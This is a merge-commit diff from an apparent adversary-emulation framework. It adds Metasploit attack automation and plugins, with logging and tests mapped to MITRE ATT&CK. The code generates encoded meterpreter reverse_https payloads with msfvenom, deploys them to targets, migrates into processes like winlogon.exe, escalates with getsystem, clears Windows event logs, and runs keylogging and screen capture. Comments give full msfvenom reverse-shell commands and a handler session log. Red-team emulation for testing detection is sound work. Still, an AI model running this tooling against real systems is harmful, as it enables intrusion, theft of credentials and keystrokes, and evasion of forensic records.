Merge pull request #9 from avast/collection_of_metasploit_attacks

Collection of metasploit attacks
pull/11/head
Thorsten Sick 3 years ago committed by GitHub
commit 44b69cf531
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

@ -220,6 +220,90 @@ class AttackLog():
}
self.log.append(data)
def start_metasploit_attack(self, source, target, metasploit_command, ttp=None):
""" Mark the start of a Metasploit based attack
@param source: source of the attack. Attack IP
@param target: Target machine of the attack
@param metasploit_command: The command to metasploit
@param ttp: TTP of the attack. From plugin
"""
data = {"timestamp": __get_timestamp__(),
"event": "start",
"type": "attack",
"sub-type": "metasploit",
"source": source,
"target": target,
"metasploit_command": metasploit_command,
"hunting_tag": __mitre_fix_ttp__(ttp),
}
self.log.append(data)
def stop_metasploit_attack(self, source, target, metasploit_command, ttp=None):
""" Mark the start of a Metasploit based attack
@param source: source of the attack. Attack IP
@param target: Target machine of the attack
@param metasploit_command: The command to metasploit
@param ttp: TTP of the attack. From plugin
"""
data = {"timestamp": __get_timestamp__(),
"event": "stop",
"type": "attack",
"sub-type": "metasploit",
"source": source,
"target": target,
"metasploit_command": metasploit_command,
"hunting_tag": __mitre_fix_ttp__(ttp),
}
self.log.append(data)
def start_attack_plugin(self, source, target, plugin_name, ttp=None):
""" Mark the start of an attack plugin
@param source: source of the attack. Attack IP
@param target: Target machine of the attack
@param plugin_name: Name of the plugin
@param ttp: TTP of the attack. From plugin
"""
data = {"timestamp": __get_timestamp__(),
"event": "start",
"type": "attack",
"sub-type": "attack_plugin",
"source": source,
"target": target,
"plugin_name": plugin_name,
"hunting_tag": __mitre_fix_ttp__(ttp),
}
self.log.append(data)
# TODO: Add parameter
# TODO: Add config
# TODO: Add results
def stop_attack_plugin(self, source, target, plugin_name, ttp=None):
""" Mark the end of an attack plugin
@param source: source of the attack. Attack IP
@param target: Target machine of the attack
@param plugin_name: Name of the plugin
@param ttp: TTP of the attack. From plugin
"""
data = {"timestamp": __get_timestamp__(),
"event": "stop",
"type": "attack",
"sub-type": "attack_plugin",
"source": source,
"target": target,
"plugin_name": plugin_name,
"hunting_tag": __mitre_fix_ttp__(ttp),
}
self.log.append(data)
def write_json(self, filename):
""" Write the json data for this log

@ -6,7 +6,9 @@ from app.attack_log import AttackLog
from app.interface_sfx import CommandlineColors
import time
import socket
from app.exceptions import MetasploitError
from app.exceptions import MetasploitError, ServerError
import requests
import random
import os
@ -23,6 +25,7 @@ class Metasploit():
"""
self.password = password
self.username = kwargs.get("username", None)
self.kwargs = kwargs
self.client = None
@ -31,7 +34,7 @@ class Metasploit():
self.attacker = kwargs.get("attacker", None)
if self.attacker:
# we expect a running attacker but without a running msfrcpd
self.start_msfrpcd(kwargs.get("username"))
self.start_msfrpcd()
kwargs["server"] = self.attacker.get_ip()
time.sleep(3) # Waiting for server to start. Or we would get https connection errors when getting the client.
@ -51,24 +54,49 @@ class Metasploit():
print(res)
return res
def start_msfrpcd(self, username):
def start_msfrpcd(self):
""" Starts the msfrpcs on the attacker. Metasploit must alredy be installed there ! """
cmd = f"msfrpcd -P {self.password} -U {username} -S"
cmd = f"killall msfrpcd; nohup msfrpcd -P {self.password} -U {self.username} -S &"
self.attacker.remote_run(cmd, disown=True)
# print("msfrpcd started")
# breakpoint()
time.sleep(3)
def get_client(self):
""" Get a local metasploit client connected to the metasploit server """
# print("starting get client")
# print(f"Password: {self.password}")
# print(f"Kwargs: {self.kwargs}")
if self.client:
return self.client
self.client = None
retries = 5
sleeptime = 5
while retries:
try:
self.client = MsfRpcClient(self.password, **self.kwargs)
break
except requests.exceptions.ConnectionError:
self.start_msfrpcd()
time.sleep(sleeptime)
sleeptime += 5
print("Failed getting connection to msfrpcd. Retries left: {retries}")
retries -= 1
if self.client is None:
raise ServerError("Was not able to properly start and connect to msfrpcd")
return self.client
def wait_for_session(self):
def wait_for_session(self, retries=50):
""" Wait until we get a session """
retries = 50
while self.get_client().sessions.list == {}:
time.sleep(1)
print(f"Waiting to get any session {retries}")
@ -159,6 +187,36 @@ class Metasploit():
return res
def smart_infect(self, target, payload_type="windows/x64/meterpreter/reverse_https", payload_name="babymetal.exe"):
""" Checks if a target already has a meterpreter session open. Will deploy a payload if not """
# TODO Smart_infect should detect the platform of the target and pick the proper parameters based on that
try:
self.start_exploit_stub_for_external_payload(payload=payload_type)
self.wait_for_session(2)
except MetasploitError:
self.attack_logger.vprint(
f"{CommandlineColors.OKCYAN}Create payload {payload_name} replacement{CommandlineColors.ENDC}",
1)
venom = MSFVenom(self.attacker, target, self.attack_logger)
venom.generate_and_deploy(payload=payload_type,
architecture="x86",
platform="windows",
lhost=self.attacker.get_ip(),
format="exe",
outfile=payload_name,
encoder="x86/shikata_ga_nai",
iterations=5
)
self.attack_logger.vprint(
f"{CommandlineColors.OKCYAN}Execute {payload_name} replacement - waiting for meterpreter shell{CommandlineColors.ENDC}",
1)
self.start_exploit_stub_for_external_payload(payload=payload_type)
self.wait_for_session()
##########################################################################
@ -176,69 +234,59 @@ class MSFVenom():
self.target = target
self.attack_logger = attack_logger
def generate_cmd(self, **kwargs):
""" Generates a cmd
def generate_payload(self, **kwargs):
""" Generates a payload on the attacker machine
:return:
"""
payload = kwargs.get("payload", None)
architecture = kwargs.get("architecture", None)
platform = kwargs.get("platform", self.target.get_os())
lhost = kwargs.get("lhost", self.attacker.get_ip())
format = kwargs.get("format", None) # file format
file_format = kwargs.get("format", None) # file format
outfile = kwargs.get("outfile", "payload.exe")
encoder = kwargs.get("encoder", None)
iterations = kwargs.get("iterations", None)
cmd = "msfvenom"
if architecture is not None:
if architecture not in ["x86", "x64"]:
raise MetasploitError(f"MSFVenom wrapper does not support architecture {architecture}")
cmd += f" -a {architecture}"
if platform is not None:
if platform not in ["windows", "linux"]:
raise MetasploitError(f"MSFVenom wrapper does not support platform {platform}")
cmd += f" --platform {platform}"
if payload is not None:
cmd += f" -p {payload}"
if lhost is not None:
cmd += f" LHOST={lhost}"
if format is not None:
cmd += f" -f {format}"
if file_format is not None:
cmd += f" -f {file_format}"
if outfile is not None:
cmd += f" -o {outfile}"
# -p payload linux/x86/meterpreter_reverse_tcp
# -f format: elf, exe, powershell, python
# --platform: linux, windows, osx
# -a arch: x86, x64
# -e encoders: x86/shikata_ga_nai
# -b bad chars to avoid
# -i iterations. encoding iterations
# -o <filename> out filename
# root@kali:~# msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '\x00' -i 3 -f python
# complex: msfvenom -a x86 --platform linux -p linux/x86/meterpreter_reverse_tcp LHOST=192.168.178.125 -e x86/shikata_ga_nai -i 3 -f elf -o reverse_meterpreter
# verified to work (Linux): msfvenom -a x64 --platform linux -p linux/x64/meterpreter_reverse_tcp LHOST=192.168.178.125 -f elf -o reverse_meterpreter
# Keep in mind: The msfconsole needs to actively listen to the connection:
# msf6 > use exploit/multi/handler
# [*] Using configured payload generic/shell_reverse_tcp
# msf6 exploit(multi/handler) > set payload linux/x64/meterpreter_reverse_tcp
# payload => linux/x64/meterpreter_reverse_tcp
# msf6 exploit(multi/handler) > set lhost 192.168.178.125
# lhost => 192.168.178.125
# msf6 exploit(multi/handler) > set lport 4444
# lport => 4444
# msf6 exploit(multi/handler) > run
#
# [*] Started reverse TCP handler on 192.168.178.125:4444
# [*] Meterpreter session 1 opened (192.168.178.125:4444 -> 192.168.178.125:42436) at 2021-06-01 03:32:12 -0400
#
# meterpreter > !!! We are in the session now !!!
return cmd
def generate_payload(self, **kwargs):
""" Generates a payload on the attacker machine
"""
cmd = self.generate_cmd(**kwargs)
if encoder is not None:
if encoder not in ["x86/shikata_ga_nai"]:
raise MetasploitError(f"MSFVenom wrapper does not support encoder {encoder}")
cmd += f" -e {encoder}"
if iterations is not None:
cmd += f" -i {iterations}"
# Detecting all the mistakes that already have been made. To be continued
# Check if encoder supports the architecture
if encoder == "x86/shikata_ga_nai" and architecture == "x64":
raise MetasploitError(f"Encoder {encoder} does not support 64 bit architecture")
# Check if payload is for the right amount of bit
if architecture == "x64" and "/x64/" not in payload:
raise MetasploitError(f"Payload {payload} does not support 64 bit architecture")
if architecture == "x86" and "/x64/" in payload:
raise MetasploitError(f"Payload {payload} does not support 32 bit architecture")
# Check if payload is platform
if platform not in payload:
raise MetasploitError(f"Payload {payload} support platform {platform}")
# Footnote: Currently we only support windows/linux and the "boring" payloads. This will be more tricky as soon as we get creative here
self.attacker.remote_run(cmd)
@ -286,3 +334,294 @@ class MSFVenom():
self.attack_logger.vprint(
f"{CommandlineColors.OKCYAN}Executed payload {payload_name} on {self.target.get_name()} {CommandlineColors.ENDC}",
1)
################
class MetasploitInstant(Metasploit):
""" A simple metasploit class with pre-defined metasploit attacks and logging. Just add water
The attacks pre-defioned in here are the bread-and-butter attacks, the most basic ones. Those you will need all the time when simulating and adversary.
No need to add specific/specific ones in here. In attack plugins you will find all the features as well. Better code them there.
"""
def __init__(self, password, attack_logger, **kwargs):
"""
:param password: password for the msfrpcd
:param attack_logger: The attack logging
:param kwargs: Relevant ones: uri, port, server, username
"""
super().__init__(password, **kwargs)
self.attack_logger = attack_logger
def parse_ps(self, ps_output):
d = []
for line in ps_output.split("\n")[6:]:
pieces = line.split(" ")
cleaned_pieces = []
for p in pieces:
if len(p):
cleaned_pieces.append(p)
if len(cleaned_pieces) > 2:
rep = {"PID": int(cleaned_pieces[0].strip()),
"PPID": int(cleaned_pieces[1].strip()),
"Name": cleaned_pieces[2].strip(),
"Arch": None,
"Session": None,
"User": None,
"Path": None}
if len(cleaned_pieces) >= 4:
rep["Arch"] = cleaned_pieces[3].strip()
if len(cleaned_pieces) >= 5:
rep["Session"] = int(cleaned_pieces[4].strip())
if len(cleaned_pieces) >= 6:
rep["User"] = cleaned_pieces[5].strip()
if len(cleaned_pieces) >= 7:
rep["Path"] = cleaned_pieces[6].strip()
d.append(rep)
return d
def filter_ps_results(self, data, user=None, name=None, arch=None):
""" Filter the process lists for certain
@param user: The user to filter for.
@param name: The process name to filter for (executable name)
@param arch: The architecture to select. 'x64' is one option
"""
res = data
if user is not None:
res = [item for item in res if item["User"] == user]
if name is not None:
res = [item for item in res if item["Name"].lower() == name.lower()]
if arch is not None:
res = [item for item in res if item["Arch"] == arch]
return res
def ps_process_discovery(self, target):
""" Do a process discovery on the target """
command = "ps -ax"
ttp = "T1057"
self.attack_logger.vprint(
f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1)
self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp)
res = self.meterpreter_execute_on([command], target)
self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp)
return res
def migrate(self, target, user=None, name=None, arch=None):
""" Migrate to a process matching certain criteria
@param user: The user to filter for.
@param name: The process name to filter for (executable name)
@param arch: The architecture to select. 'x64' is one option
"""
ttp = "T1055"
process_list = self.ps_process_discovery(target)
ps = self.parse_ps(process_list[0])
filtered_list = self.filter_ps_results(ps, user, name, arch)
if len(filtered_list) == 0:
print(process_list)
raise MetasploitError("Did not find a matching process to migrate to")
# picking random target process
target_process = random.choice(filtered_list)
print(f"Migrating to process {target_process}")
command = f"migrate {target_process['PID']}"
self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp)
res = self.meterpreter_execute_on([command], target)
print(res)
self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp)
return res
def arp_network_discovery(self, target):
""" Do a network discovery on the target """
command = "arp"
ttp = "T1016"
self.attack_logger.vprint(
f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1)
self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp)
res = self.meterpreter_execute_on([command], target)
print(res)
self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp)
return res
def getsystem(self, target):
""" Do a network discovery on the target """
command = "getsystem"
ttp = "????" # It uses one out of three different ways to elevate privileges.
# https://docs.rapid7.com/metasploit/meterpreter-getsystem/
self.attack_logger.vprint(
f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1)
self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp)
res = self.meterpreter_execute_on([command], target)
print(res)
self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp)
return res
def clearev(self, target):
""" Clears windows event logs """
command = "clearev"
ttp = "T1070.001" # It uses one out of three different ways to elevate privileges.
self.attack_logger.vprint(
f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1)
self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp)
res = self.meterpreter_execute_on([command], target)
print(res)
self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp)
return res
def screengrab(self, target):
""" Creates a screenshot
Before using it, migrate to a process running while you want to monitor.
One with the permission "NT AUTHORITY\\SYSTEM"
"""
command = "screengrab"
ttp = "T1113" # It uses one out of three different ways to elevate privileges.
self.attack_logger.vprint(
f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1)
self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp)
res = self.meterpreter_execute_on(["use espia"], target)
print(res)
res = self.meterpreter_execute_on([command], target)
print(res)
self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp)
return res
def keylogging(self, target, monitoring_time):
""" Starts keylogging
Before using it, migrate to a process running while you want to monitor.
"winlogon.exe" will monitor user logins. "explorer.exe" during the session.
@param monitoring_time: Seconds the keylogger is running
@param monitoring_time: The time to monitor the keys. In seconds
"""
command = "keyscan_start"
ttp = "T1056.001" # It uses one out of three different ways to elevate privileges.
self.attack_logger.vprint(
f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1)
self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp)
res = self.meterpreter_execute_on([command], target)
print(res)
time.sleep(monitoring_time)
res = self.meterpreter_execute_on(["keyscan_dump"], target)
print(res)
self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp)
return res
def getuid(self, target):
""" Returns the UID
"""
command = "getuid"
ttp = "T1056.001" # It uses one out of three different ways to elevate privileges.
self.attack_logger.vprint(
f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1)
self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp)
res = self.meterpreter_execute_on([command], target)
self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp)
return res[0]
def sysinfo(self, target):
""" Returns the sysinfo
"""
command = "sysinfo"
ttp = "T1082" # It uses one out of three different ways to elevate privileges.
self.attack_logger.vprint(
f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1)
self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp)
res = self.meterpreter_execute_on([command], target)
self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp)
return res[0]

@ -151,10 +151,10 @@ class AttackPlugin(BasePlugin):
self.targets = targets
ips = [tgt.get_ip() for tgt in targets]
self.setup()
self.attack_logger.start_kali_attack(self.attacker_machine_plugin.config.vmname(), ips, self.name, ttp=self.get_ttp())
self.attack_logger.start_attack_plugin(self.attacker_machine_plugin.config.vmname(), ips, self.name, ttp=self.get_ttp())
res = self.run(targets)
self.teardown()
self.attack_logger.stop_kali_attack(self.attacker_machine_plugin.config.vmname(), ips, self.name, ttp=self.get_ttp())
self.attack_logger.stop_attack_plugin(self.attacker_machine_plugin.config.vmname(), ips, self.name, ttp=self.get_ttp())
return res
def get_ttp(self):

@ -332,6 +332,7 @@ class FIN7Plugin(AttackPlugin):
# spawn powershell through cmd
# !!! admin host!!! use password with paexec to move lateral to it admin host https://attack.mitre.org/techniques/T1021/002/
# paexec starts temporary windows service and executes hollow.exe https://attack.mitre.org/techniques/T1021/002/
# https://www.poweradmin.com/paexec/
# => Lateral move to itadmin
# hollow.exe spawns svchost and unmaps memory image https://attack.mitre.org/techniques/T1055/012/
# svchost starts data exchange

@ -0,0 +1,43 @@
#!/usr/bin/env python3
# A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin
from app.metasploit import MetasploitInstant
class MetasploitArpPlugin(AttackPlugin):
# Boilerplate
name = "metasploit_arp"
description = "Network discovery via metasploit using arp"
ttp = "T1016"
references = ["https://attack.mitre.org/techniques/T1016/"]
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
def __init__(self):
super().__init__()
self.plugin_path = __file__
def run(self, targets):
""" Run the command
@param targets: A list of targets, ip addresses will do
"""
res = ""
payload_type = "windows/x64/meterpreter/reverse_https"
payload_name = "babymetal.exe"
target = self.targets[0]
metasploit = MetasploitInstant(self.metasploit_password,
attack_logger=self.attack_logger,
attacker=self.attacker_machine_plugin,
username=self.metasploit_user)
metasploit.smart_infect(target, payload_type, payload_name, )
metasploit.arp_network_discovery(target)
return res

@ -0,0 +1,43 @@
#!/usr/bin/env python3
# A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin
from app.metasploit import MetasploitInstant
class MetasploitMigratePlugin(AttackPlugin):
# Boilerplate
name = "metasploit_clearev"
description = "Clear windows event logs: Application, System, and Security logs. Windows only"
ttp = "T1070.001"
references = ["https://attack.mitre.org/techniques/T1070/001/"]
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
def __init__(self):
super().__init__()
self.plugin_path = __file__
def run(self, targets):
""" Run the command
@param targets: A list of targets, ip addresses will do
"""
res = ""
payload_type = "windows/meterpreter_reverse_https"
payload_name = "babymetal.exe"
target = self.targets[0]
metasploit = MetasploitInstant(self.metasploit_password,
attack_logger=self.attack_logger,
attacker=self.attacker_machine_plugin,
username=self.metasploit_user)
metasploit.smart_infect(target, payload_type, payload_name, )
metasploit.clearev(target)
return res

@ -0,0 +1,43 @@
#!/usr/bin/env python3
# A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin
from app.metasploit import MetasploitInstant
class MetasploitGetsystemPlugin(AttackPlugin):
# Boilerplate
name = "metasploit_getsystem"
description = "Privilege elevation via metasploit getsystem"
ttp = "????"
references = ["https://docs.rapid7.com/metasploit/meterpreter-getsystem/"]
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
def __init__(self):
super().__init__()
self.plugin_path = __file__
def run(self, targets):
""" Run the command
@param targets: A list of targets, ip addresses will do
"""
res = ""
payload_type = "windows/x64/meterpreter/reverse_https"
payload_name = "babymetal.exe"
target = self.targets[0]
metasploit = MetasploitInstant(self.metasploit_password,
attack_logger=self.attack_logger,
attacker=self.attacker_machine_plugin,
username=self.metasploit_user)
metasploit.smart_infect(target, payload_type, payload_name, )
metasploit.getsystem(target)
return res

@ -0,0 +1,44 @@
#!/usr/bin/env python3
# A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin
from app.metasploit import MetasploitInstant
class MetasploitKeyloggingPlugin(AttackPlugin):
# Boilerplate
name = "metasploit_getuid"
description = "Getuid"
ttp = "T1033"
references = ["https://attack.mitre.org/techniques/T1033/"]
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
def __init__(self):
super().__init__()
self.plugin_path = __file__
def run(self, targets):
""" Run the command
@param targets: A list of targets, ip addresses will do
"""
res = ""
payload_type = "windows/meterpreter_reverse_https"
payload_name = "babymetal.exe"
target = self.targets[0]
metasploit = MetasploitInstant(self.metasploit_password,
attack_logger=self.attack_logger,
attacker=self.attacker_machine_plugin,
username=self.metasploit_user)
metasploit.smart_infect(target, payload_type, payload_name, )
uid = metasploit.getuid(target)
print(f"UID: {uid}")
return res

@ -0,0 +1,45 @@
#!/usr/bin/env python3
# A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin
from app.metasploit import MetasploitInstant
class MetasploitKeyloggingPlugin(AttackPlugin):
# Boilerplate
name = "metasploit_keylogging"
description = "Migrate meterpreter to another process via metasploit"
ttp = "T1056.001"
references = ["https://attack.mitre.org/techniques/T1056/001/"]
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
def __init__(self):
super().__init__()
self.plugin_path = __file__
def run(self, targets):
""" Run the command
@param targets: A list of targets, ip addresses will do
"""
res = ""
payload_type = "windows/meterpreter_reverse_https"
payload_name = "babymetal.exe"
target = self.targets[0]
metasploit = MetasploitInstant(self.metasploit_password,
attack_logger=self.attack_logger,
attacker=self.attacker_machine_plugin,
username=self.metasploit_user)
metasploit.smart_infect(target, payload_type, payload_name, )
metasploit.migrate(target, name="winlogon.exe")
metasploit.keylogging(target, monitoring_time=20)
return res

@ -0,0 +1,43 @@
#!/usr/bin/env python3
# A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin
from app.metasploit import MetasploitInstant
class MetasploitMigratePlugin(AttackPlugin):
# Boilerplate
name = "metasploit_migrate"
description = "Migrate meterpreter to another process via metasploit"
ttp = "T1055"
references = ["https://attack.mitre.org/techniques/T1055/"]
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
def __init__(self):
super().__init__()
self.plugin_path = __file__
def run(self, targets):
""" Run the command
@param targets: A list of targets, ip addresses will do
"""
res = ""
payload_type = "windows/meterpreter_reverse_https"
payload_name = "babymetal.exe"
target = self.targets[0]
metasploit = MetasploitInstant(self.metasploit_password,
attack_logger=self.attack_logger,
attacker=self.attacker_machine_plugin,
username=self.metasploit_user)
metasploit.smart_infect(target, payload_type, payload_name, )
metasploit.migrate(target, user="NT AUTHORITY\\SYSTEM", name="svchost.exe", arch="x64")
return res

@ -0,0 +1,43 @@
#!/usr/bin/env python3
# A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin
from app.metasploit import MetasploitInstant
class MetasploitPsPlugin(AttackPlugin):
# Boilerplate
name = "metasploit_ps"
description = "Process discovery via metasploit"
ttp = "T1057"
references = ["https://attack.mitre.org/techniques/T1057/"]
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
def __init__(self):
super().__init__()
self.plugin_path = __file__
def run(self, targets):
""" Run the command
@param targets: A list of targets, ip addresses will do
"""
res = ""
payload_type = "windows/x64/meterpreter/reverse_https"
payload_name = "babymetal.exe"
target = self.targets[0]
metasploit = MetasploitInstant(self.metasploit_password,
attack_logger=self.attack_logger,
attacker=self.attacker_machine_plugin,
username=self.metasploit_user)
metasploit.smart_infect(target, payload_type, payload_name, )
metasploit.ps_process_discovery(target)
return res

@ -0,0 +1,45 @@
#!/usr/bin/env python3
# A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin
from app.metasploit import MetasploitInstant
class MetasploitScreengrabPlugin(AttackPlugin):
# Boilerplate
name = "metasploit_screengrab"
description = "Grab a screenshot"
ttp = "T1055"
references = ["https://attack.mitre.org/techniques/T1055/"]
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
def __init__(self):
super().__init__()
self.plugin_path = __file__
def run(self, targets):
""" Run the command
@param targets: A list of targets, ip addresses will do
"""
res = ""
payload_type = "windows/meterpreter_reverse_https"
payload_name = "babymetal.exe"
target = self.targets[0]
metasploit = MetasploitInstant(self.metasploit_password,
attack_logger=self.attack_logger,
attacker=self.attacker_machine_plugin,
username=self.metasploit_user)
metasploit.smart_infect(target, payload_type, payload_name, )
metasploit.migrate(target, user="NT AUTHORITY\\SYSTEM")
metasploit.screengrab(target)
return res

@ -0,0 +1,44 @@
#!/usr/bin/env python3
# A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin
from app.metasploit import MetasploitInstant
class MetasploitKeyloggingPlugin(AttackPlugin):
# Boilerplate
name = "metasploit_sysinfo"
description = "Sysinfo"
ttp = "T1082"
references = ["https://attack.mitre.org/techniques/T1082/"]
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
def __init__(self):
super().__init__()
self.plugin_path = __file__
def run(self, targets):
""" Run the command
@param targets: A list of targets, ip addresses will do
"""
res = ""
payload_type = "windows/meterpreter_reverse_https"
payload_name = "babymetal.exe"
target = self.targets[0]
metasploit = MetasploitInstant(self.metasploit_password,
attack_logger=self.attack_logger,
attacker=self.attacker_machine_plugin,
username=self.metasploit_user)
metasploit.smart_infect(target, payload_type, payload_name, )
si = metasploit.sysinfo(target)
print(f"Sysinfo: {si}")
return res

@ -119,3 +119,87 @@ class TestMachineConfig(unittest.TestCase):
self.assertEqual(data[0]["target"], target)
self.assertEqual(data[0]["kali_name"], attack_name)
self.assertEqual(data[0]["hunting_tag"], "MITRE_" + ttp)
def test_metasploit_attack_start(self):
""" Starting a metasploit attack """
al = AttackLog()
source = "asource"
target = "a target"
ttp = "1234"
attack_name = "a name"
al.start_metasploit_attack(source=source,
target=target,
metasploit_command=attack_name,
ttp=ttp,
)
data = al.get_dict()
self.assertEqual(data[0]["event"], "start")
self.assertEqual(data[0]["type"], "attack")
self.assertEqual(data[0]["sub-type"], "metasploit")
self.assertEqual(data[0]["source"], source)
self.assertEqual(data[0]["target"], target)
self.assertEqual(data[0]["metasploit_command"], attack_name)
self.assertEqual(data[0]["hunting_tag"], "MITRE_" + ttp)
def test_metasploit_attack_stop(self):
""" Stopping a metasploit attack """
al = AttackLog()
source = "asource"
target = "a target"
ttp = "1234"
attack_name = "a name"
al.stop_metasploit_attack(source=source,
target=target,
metasploit_command=attack_name,
ttp=ttp,
)
data = al.get_dict()
self.assertEqual(data[0]["event"], "stop")
self.assertEqual(data[0]["type"], "attack")
self.assertEqual(data[0]["sub-type"], "metasploit")
self.assertEqual(data[0]["source"], source)
self.assertEqual(data[0]["target"], target)
self.assertEqual(data[0]["metasploit_command"], attack_name)
self.assertEqual(data[0]["hunting_tag"], "MITRE_" + ttp)
def test_attack_plugin_start(self):
""" Starting a attack plugin """
al = AttackLog()
source = "asource"
target = "a target"
ttp = "1234"
attack_name = "a name"
al.start_attack_plugin(source=source,
target=target,
plugin_name=attack_name,
ttp=ttp,
)
data = al.get_dict()
self.assertEqual(data[0]["event"], "start")
self.assertEqual(data[0]["type"], "attack")
self.assertEqual(data[0]["sub-type"], "attack_plugin")
self.assertEqual(data[0]["source"], source)
self.assertEqual(data[0]["target"], target)
self.assertEqual(data[0]["plugin_name"], attack_name)
self.assertEqual(data[0]["hunting_tag"], "MITRE_" + ttp)
def test_attack_plugin_stop(self):
""" Stopping a attack plugin"""
al = AttackLog()
source = "asource"
target = "a target"
ttp = "1234"
attack_name = "a name"
al.stop_attack_plugin(source=source,
target=target,
plugin_name=attack_name,
ttp=ttp,
)
data = al.get_dict()
self.assertEqual(data[0]["event"], "stop")
self.assertEqual(data[0]["type"], "attack")
self.assertEqual(data[0]["sub-type"], "attack_plugin")
self.assertEqual(data[0]["source"], source)
self.assertEqual(data[0]["target"], target)
self.assertEqual(data[0]["plugin_name"], attack_name)
self.assertEqual(data[0]["hunting_tag"], "MITRE_" + ttp)

Loading…
Cancel
Save